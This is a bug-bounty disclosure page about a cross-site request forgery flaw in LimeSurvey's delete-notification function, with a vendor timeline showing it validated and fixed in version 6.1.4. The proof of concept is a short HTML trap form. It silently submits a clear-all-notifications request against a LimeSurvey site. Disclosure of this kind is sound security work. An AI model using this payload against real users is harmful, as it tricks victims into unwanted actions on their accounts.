CSRF in the delete notification function in limesurvey/limesurvey


Reported on

Jun 26th 2023


The web application is vulnerable to CSRF in the delete notification function.

Proof of Concept

Step 1: See that user demo has some notifications. Step 2: Host an HTML trap page and send the URL to the victim

  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.limesurvey.org/index.php">
      <input type="hidden" name="r" value="admin&#47;notification" />
      <input type="hidden" name="sa" value="clearAllNotifications" />
      <input type="submit" value="Submit request" />

And the malicious URL


Step 3: After the user clicks on the malicious URL, verify that the notifications are cleared.


The CSRF vulnerability could trick users to delete all notifications

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago
Carsten Schmitz
3 months ago


Internal reference: #18924

Carsten Schmitz validated this vulnerability 3 months ago
tuannq2299 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 6.1.4 with commit b9622b 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Carsten Schmitz published this vulnerability 2 months ago
to join this conversation